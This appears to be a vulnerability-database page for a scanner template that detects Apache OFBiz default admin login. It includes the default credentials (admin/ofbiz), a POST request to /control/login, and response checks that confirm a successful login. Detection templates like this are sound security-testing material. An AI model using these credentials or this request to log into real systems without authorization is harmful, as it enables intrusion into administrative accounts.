ofbiz-default-password: Apache OfBiz Default Login

2025-08-01 Apache OfBiz PoC Public

Description

Apache OfBiz default admin login credentials were detected.

PoC

id: ofbiz-default-password

info:
  name: Apache OfBiz Default Login
  author: pdteam
  severity: high
  verified: false
  description: |-
    Apache OfBiz default admin login credentials were detected.
  reference:
    - https://www.tenable.com/plugins/nessus/105247
  tags: default-login,ofbiz
  created: 2023/06/24

rules:
  r0:
    request:
      method: POST
      path: /control/login
      body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
    expression: |
      (response.status == 200 || response.status == 302) && response.body.bcontains(b'ofbiz-pagination-template') && response.body.bcontains(b'<span>Powered by OFBiz</span>') && !response.body.bcontains(b'user login id "admin" has been disabled')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities